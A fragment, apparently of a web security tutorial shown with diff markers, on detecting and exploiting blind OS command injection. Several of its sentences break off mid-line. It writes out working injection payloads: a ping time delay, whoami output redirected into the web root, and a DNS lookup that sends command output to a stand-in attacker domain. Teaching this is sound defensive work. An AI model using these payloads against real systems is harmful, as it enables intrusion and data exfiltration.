 Many instances of OS command injection are blind vulnerabilities.
 This means that the application does not return the output from the command within its HTTP response.
 Blind vulnerabilities can still be exploited, but different techniques are required.

 Consider a web site that lets users submit feedback about the site.
 The user enters their email address and feedback message.
 The server-side application then generates an email to a site administrator containing the feedback.
 To do this, it calls out to the

 mail -s "This site is great" -aFrom:email@example.com firstname.lastname@example.org

 echo payload would not be effective.
 In this situation, you can use a variety of other techniques to detect and exploit a vulnerability.

 You can use an injected command that will trigger a time delay, allowing you to confirm that the command was executed based on the time that the application takes to respond.
 The

 & ping -c 10 127.0.0.1 &

 This command will cause the application to ping its loopback network adapter for 10 seconds.

-You can redirect the output from the injected command into a file within the web root that you can then retrieve using your browser.
+You can redirect the output from the injected command into a file within the web root that you can then retrieve using the browser.
 For example, if the application serves static resources from the filesystem location

 & whoami > /var/www/static/whoami.txt &

 whoami command to the specified file.
 You can then use the browser to fetch

 You can use an injected command that will trigger an out-of-band network interaction with a system that you control, using OAST techniques.
 For example:

 & nslookup kgji2ohoyw.web-attacker.com &

 nslookup command to cause a DNS lookup for the specified domain.
 The attacker can monitor for the specified lookup occurring, and thereby detect that the command was successfully injected.

 The out-of-band channel also provides an easy way to exfiltrate the output from injected commands:

 & nslookup `whoami`.kgji2ohoyw.web-attacker.com &

 This will cause a DNS lookup to the attacker's domain containing the result of the

 A variety of shell metacharacters can be used to perform OS command injection attacks.

 A number of characters function as command separators, allowing commands to be chained together.
 The following command separators work on both Windows and Unix-based systems: